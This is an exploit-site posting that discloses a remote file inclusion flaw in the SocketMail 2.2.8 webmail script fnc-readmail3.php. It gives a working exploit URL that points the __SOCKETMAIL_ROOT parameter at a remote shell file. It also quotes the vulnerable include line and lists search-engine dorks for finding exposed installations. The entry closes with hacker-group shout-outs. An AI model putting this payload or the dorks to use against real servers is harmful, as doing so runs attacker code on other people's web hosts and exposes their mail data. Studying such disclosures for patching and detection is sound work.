SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability

2007-10-22T00:00:00
ID 1337DAY-ID-2239
Type zdt
Reporter BiNgZa
Modified 2007-10-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability
======================================================================



Vulnerability Type: Remote File Inclusion
Vulnerable file: /mail/content/fnc-readmail3.php
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: __SOCKETMAIL_ROOT
Line number: 399
Lines:

----------------------------------------------
} else {
    include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");
}

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm, str0ke

BiG sHoUt OuT tO udplink.net

FoUnD By BiNgZa

DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"

DORK2: "Powered by SocketMail"



#  0day.today [2018-03-28]  #